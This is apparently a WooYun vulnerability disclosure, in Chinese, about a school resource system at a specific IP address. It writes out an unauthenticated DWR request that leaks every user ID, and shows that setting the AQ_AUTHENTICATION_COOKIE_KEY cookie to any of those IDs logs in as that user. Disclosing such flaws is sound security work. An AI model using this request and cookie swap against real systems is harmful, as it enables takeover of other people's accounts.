WooYun.org

这里在展示用户名时，会发送如下请求：

http://202.108.154.209/zy/dwr/call/plaincall/gyTeacherRemoteCallController.getDepartmentGroupTree.dwr
callCount=1&windowName=frmain&c0-scriptName=gyTeacherRemoteCallController&c0-methodName=getDepartmentGroupTree&c0-id=0&batchId=1&page=%2Fzy%2Fresource%2Fshare%2FshareFile.do%3FisOnly%3Dfalse%26ids%3Dbe7961c04c8044658744ab3907d2caab&httpSessionId=&scriptSessionId=7134AF792B42821FF2F9188F76D23922

返回结果如图：

这里会返回所有的用户，准确说应该是用户的唯一标识，即上上图中展示出来的所有用户信息，主要就是会返回user_id，即上图的id。
问题在于这里的id，即user_id就是用户登录的验证信息Cookie中AQ_AUTHENTICATION_COOKIE_KEY的值，而此值就是用户的唯一验证内容，所以只要我们拿到这个AQ_AUTHENTICATION_COOKIE_KEY，user_id的值就能登录对应的user_id用户。
所以通过此处的信息泄漏，我们拿到了全站用户的登陆认证信息，可以登陆任意用户。
最重要的是上面的获取全部用户id的请求无需登录即可发送上面的POST请求，获得全部用户的登陆认证信息，即可以登陆全站任意用户。
漏洞证明：
比如id：d75e095056734f928e49060147a429a4
1、访问http://202.108.154.209/datacenter/#，此时为登录
2、我们访问上面的请求，获取到id
3、添加cookie内容：AQ_AUTHENTICATION_COOKIE_KEY=d75e095056734f928e49060147a429a4

4、保存设置的cookie后，刷新页面即可登录此id对应的用户

这个漏洞还是比较有意思的，主要是信息泄露+认证逻辑问题，用户登录认证不严格导致登陆任意用户。
比起SQL注入更直接，可以在无线登录的情况下，直接登陆全站用户了。
此漏洞的价值也在与此，因为这个系统是必须登录才能使用的，第一步就是等认证，但是通过这个漏洞，此登录门槛就没用了，至于登陆后的漏洞就太多了，见下一个漏洞吧~~~